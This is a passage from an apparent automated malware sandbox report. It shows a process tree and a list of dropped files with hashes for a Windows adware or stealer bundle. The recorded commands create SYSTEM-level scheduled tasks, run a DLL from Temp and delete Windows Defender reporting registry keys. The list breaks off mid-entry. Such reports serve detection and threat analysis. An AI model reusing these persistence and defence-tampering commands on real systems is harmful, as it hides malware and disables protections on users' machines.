                                                                                                                                                                                                                          schtasks /CREATE /TN "tCfKGXDvAPRRvLf2" /F /xml "C:\Program Files (x86)\MiKcmJhqU\XuOYgjZ.xml" /RU "SYSTEM"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                          PID:1192
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /END /TN "tCfKGXDvAPRRvLf"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:3624
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /DELETE /F /TN "tCfKGXDvAPRRvLf"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:4076
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /CREATE /TN "WLJiZzmdxByrvR" /F /xml "C:\Program Files (x86)\WQqkELkVHOYU2\CikUwMv.xml" /RU "SYSTEM"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                              PID:4304
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /CREATE /TN "yUJcmcRyNwKRa2" /F /xml "C:\ProgramData\UrkGLyjigLRybTVB\eSQkmpZ.xml" /RU "SYSTEM"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                              PID:3756
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /CREATE /TN "iOUfqyxVtpISCFCEp2" /F /xml "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR\Wytvcar.xml" /RU "SYSTEM"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                              PID:4536
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /CREATE /TN "phKAbPCvhOcihqTrHht2" /F /xml "C:\Program Files (x86)\mQvpiNUsNPjLC\UQNXiPX.xml" /RU "SYSTEM"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                              PID:2800
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /CREATE /TN "hNXJOWJzZwASvpUks" /SC once /ST 00:34:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\YYFeagcQEOcPvCau\TbddCsxl\dUjzZxU.dll\",#1 /btsite_idYKp 385118" /V1 /F
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                              PID:1672
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /run /I /tn "hNXJOWJzZwASvpUks"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:1284
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:5028
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:3964
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:3040
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:528
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "OvvioKEypuBLsTFYZ"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:4192
                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YYFeagcQEOcPvCau\TbddCsxl\dUjzZxU.dll",#1 /btsite_idYKp 385118
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:1840
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                            C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YYFeagcQEOcPvCau\TbddCsxl\dUjzZxU.dll",#1 /btsite_idYKp 385118
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:4408
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                schtasks /DELETE /F /TN "hNXJOWJzZwASvpUks"
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:4304

                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              1.4MB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              bb00c468cc289579505696a5b043c909

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              38b7afc819a00d493e921b5a288438de3dc4dd31

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              a745cf65e54422756b17228d4e396626e612e39f365eeb81688cfd44d8abafcd

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              bea501353e152b704f83bcc3f577a3223a137459882251edcf76a07c1cf02fd704564edaad938051ff135b7493a241ea7c103118242b5c0824c943ea4f4da85f

                                                                                                                                                                                                                                            • C:\ProgramData\Are.docx

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              11KB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              a33e5b189842c5867f46566bdbf7a095

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                                                                                                                                                                            • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              593KB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                                                            • C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              2.0MB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              187B

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              136B

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              150B

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              10KB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              86750401c2408fbf291cfdf77c39a3e8

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              fc84d9e156e727f70a4e81ff9efe2d14e3306b0f

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              88a9ff79dc0dcd6a9982352b9a5bdbadeca304ebf79f1b7267d1c763667d406a

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              149f0317e2339c3cb8bf6a98a09922eebc649a369f9f7d7ae7092d0a7255424d3b4e0f8f168aaf0b0ba0dc674ac5a19bc14012007965d441d4dacafd22bb8989

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              27KB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              5cbaca79dff8cd391ca7092ed33493ee

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              3a536ddcbcbfd418d22d788546b560ac20f71923

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              cdb18d72ff9f7c1b5f684346bb0b0973c1932475a598c739f3737456a9076afc

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              df687cf39529246aea71c349254a5294ebaecad8ed3c6f5f96d26e310f98c7f4dce2ff31ef49ee5c99067611db550c700ea5c8e2d59d7a24c32b4c941935ae76

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              2KB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              a6ea7bfcd3aac150c0caef765cb52281

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              037dc22c46a0eb0b9ad4c74088129e387cffe96b

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              f019af2e5e74cdf13c963910500f9436c66b6f2901f5056d72f82310f20113b9

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              c8d2d373b48a26cf6eec1f5cfc05819011a3fc49d863820ad07b6442dd6d5f64e27022a9e4c381eb58bf7f6b19f8e77d508734ff803073ec2fb32da9081b6f23

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              151B

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              9KB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              0b852013625a6b06cc565cdd28133009

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              84a7629ee6598f6b2fd7091ee672200d4fee66e3

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              24de32b2f6c817e4c699a6e201b74480bd3692d5f1c9e618a48b534659feeac5

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              69ce933156c059fc24f20c89a3a993d132f98cb1f1459d1fb5100a169668b5bad6183c3ec5f34f0f8453237ff5d5949635f4536ec431dd23f2e3d2ec70fbdaa3

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\A1UTnHalTLsCQFuXmO9N2dG4.exe

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              1.6MB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              5f97dafecd770e585f6a7bf5d4605497

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              218502c4434ff6825d61a5829a80017b46f98dd0

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              4662b73194680ceb583d2e0345fdac3d28b91c3d490c1c1661a67920269a980d

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              cc0eaaec5dc8c7fc7e28bc1049486e5a475f1bfd3c97a7c8d61140bf9e2766a37faf7beccd105470c93cc1b3e906864a957ea5f2fac5b78848a8e7e915eaf13f

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161642571\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              2.3MB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              c0fda03372ae2e7db57616dfd3cb3680

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              59e0c4a92122c8823c1d5fa13a701140ac0a0149

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              b3a48ff577ef09a8fd3b87bb1b36f70ff0078e9e8b1c9e3d34ecb296014d1cdd

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              ff54edccc76b242357b4b81250f0eb7f84d3385b8b2ba0ecfbc179b298ce69cab045c616dca6477fe0c0213d7c6fe851ea1215d05b8c6887d10a0c1645f0e94c

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161642571\assistant\assistant_installer.exe

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              1.2MB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              bf5731e651340f076d245cf60eebf7de

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              1b45aca5dc550733ca738427252f4ceed351b501

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              45ffd4d8875d7cd9e702c1767078ba07fb9ca4e075d693628bd6c91e4df220fe

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              97f40c774908d1dc587f11dd6d59f58da24fe75a834f9baea02568fb3819761ebb82e82fb731327c0655e835fa04e4f37098bb104375ec5b9fcf6364904c8230

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161642571\assistant\assistant_installer.exe

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              640KB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              9f0f3a862ec96a3404cca36a88f8f4fc

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              780eb31eb5ca5ea46efd10c14b35452b1e0e2295

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              d54d8d6979b68136b9fef3e547cc2221ef315ffb2123b91a86b11caac2d0e439

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              da9a93a6b82f517899f2e7d4eba87e15ee9adfcc9f473ffd193d0bd8a90c28e1acb40ce4276bfe138f420314915ca3a902c8dcb7e1979fde9e6474e4e7ed6aa5

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161642571\assistant\dbgcore.dll

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              166KB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              a59b6c6d04bac536cc7fafe92f0d1bda

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              6d5bbdfafbe2ea65e3aa9abc088e0fc6e20be8a1

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              c2d92d6e9a3ea40f38d275499bef7ba899802f131160ce1a2f76314b87b531ac

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              49e748676c54482f7de089fb6eaa45b5cb3e59a1b9125d90619371678749a0b80cf8ef8c7cf75c8486d20b89639a8b679c23a671a2c3b6dff1f86ea9cb1a7f5c

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161642571\assistant\dbghelp.dll

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              512KB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              37a1e2ed47186e1624e0588774aa01af

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              365ec15c880834e309a4327cedeaf35cded45d35

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              cb00803f86d22fae5339e099b09dcddbd3d131dbe34fb7bd1c6e7dc3fd6dcfa0

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              e49955689c28fe41b201fddb4576725ed19f657353a296f6017d11ffa1757afedf0df13879245d20a99a4689c2693244bffa570fad657ca70704e0c08026e7da

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161642571\assistant\dbghelp.dll

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              1.7MB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              d3a9b47c39c59d0ff5a22d5db5875bff

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              1953584e5d1d3c57db9420fcb1472c7a8a630241

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              31c27c692b4736b7d32e546fa8daef862d1f6f1caf35fa1afd2a0376d319f8f6

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              b2c50dd36cfa5fc9daf91442375dd230d88ab5780db177d3561085f974546c880745bb6bd13a343d6ff6c5a681310b0b1f6528613f82d45814c8e30a9b934fb7

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161642571\assistant\dbghelp.dll

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              384KB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              3638531fae0c94c07dbe9062e39edbf6

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              b5de9c59a746a2600fafd7f6eb5f219a82e5291d

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              5d958fccb3bf0decee7db50eae264d5f10d83aff698113066b01c2277a270cef

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              c8a9b12327a7c2751baac808dffbcd371556edee279af14d1c5335a284a710910857cf37b76b540804f38d08ec93254b4946a2575b864d3b4d3bffd8dbe29e38

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161642571\opera_package

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              9.9MB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              f140c6bea7063c344ff1f5bd210f8b21

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              cbed8e5375a5673c4320f1d6241f9415e3b88654

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              40b89f03022fbaa7fe4031d12950189c982b509f10f88df3efa224066798e745

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              b4ca175917b7f4a9e8191895b55828fcbdb7794f6de55182f40c14c04ec1341d46f1c93ba75d673527a05ec6434fe3a47bbd2d27afc6f4184ff287691260d531

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSA17B.tmp\Install.exe

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              1.4MB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              7ce02b109c7552c2f33bcd4301cb492a

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              2ef4c984d90d45f959976e86dac5b0c9f0e7e6c9

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              5bf8a7b65a2a455de6d8f347b8186609d09a7c373e72b79faff82bb6a9f7454a

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              1871f539776e33b7d48bfa152ff4d95a9cc978ea42e81bd5dc10e4f35ee46bb7d1bb4b4a47834fe6cb5e14ecaf2d0c9aaa2bff68b0ffea38070500b077268ba0

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSA17B.tmp\Install.exe

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              1.1MB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              a80ead68e58eda791938b4c378c0227b

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              bdafc45ec3e0274daa336d7ae78612fcd22ed3d8

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              54a0553b70aaca52951775f1f07971f472586bd6db2d1de4b98b0967fd408e34

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              91b2f9e241718fdee70471d6a00445e0cbb05a18eaac85529eb9757a0550e67a96093537ce0303d07470f6fde551fda032c9d030a77c20cdbeb0605a87619d51

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSAD71.tmp\Install.exe

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              640KB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              6c9755203a16246e54a155a6d7e95953

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              f88a3c5a01af1219e07d4033c4f86501fdcbb854

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              55284b326f4829795ff76f1311985604c156923e726e917c945ef7e6845601d7

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              a596b00dda8f5ecbda392c3b9dba4af2d02bc0e49a2a40046a08195ac686f912a9b70681dc95f3302662d1eab59c3ccbb433c71748d19e86e282d9a2f68c6efa

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSAD71.tmp\Install.exe

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              2.5MB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              3195d03ea866633028cf53e5bd3c8541

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              5256f2dd99a4c5a0bf0067fd46a47a30803fc4fb

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              fefa586c4da8f887bb5dbaeab91ca6515996c28a6b1565ff4829030f7b1e9bc4

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              aad6dcd47980a90d90cfeb5a69a0fdec392a34bee9d869662591e5443aeeb253f308431b05eebaf72fe1f63a3390d9f3f85441774e6d2183e629b6abc9a22a92

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              4.7MB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              5e94f0f6265f9e8b2f706f1d46bbd39e

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              d0189cba430f5eea07efe1ab4f89adf5ae2453db

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              50a46b3120da828502ef0caba15defbad004a3adb88e6eacf1f9604572e2d503

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              473dfa66a36feed9b29a43245074141478327ce22ba7cce512599379dcb783b4d665e2d65c5e9750b988c7ed8f6c3349a7a12d4b8b57c89840eee6ca6e1a30cd

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2401161642524341540.dll

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              3.9MB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              d1d1fbb54931b22570d737349ff08516

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              45e2133920f516bfc2cb6f40a25f0183fa313883

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              d0884b48c5f37bc2c8e6c8246ccb7069403d6cc5b255196f4c4ad7b21f46cafd

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              8dcf2be0a5a1025c2a5849c8b39a281cc5e39f0e25c99b8288ebf4ef9b8bc1b752151217f9409416e196780fd7fbc34b1ee7a80890e7ee06c146d02080eb7bec

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2401161642533092356.dll

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              4.3MB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              1e0afa7145c1a67c7726173c30706570

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              905e243ad2e7ba46ee7e202b06f3259d85e01bb4

                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                              90318ff60c45cedb6d29fc8a5eaf2510234bfc24a9794ccd0e9aeb2eaa8a79fe

                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                              9dc1a0e0abba9fda4fd6ab5cfa8b44cfd774f531c55d17278c53b6c0437232e0d1b58abe96b399aff584c65a8719294fdd277cab295f5afa0adae73b974ffa38

                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2401161642558244776.dll

                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                              1.9MB

                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                              3203c99e720417c7a5739156f93cf1b3

                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                              a399fd465d52bb4b0c203885223feabf971c63a7

                                                                                                                                                                                                                                              SHA256

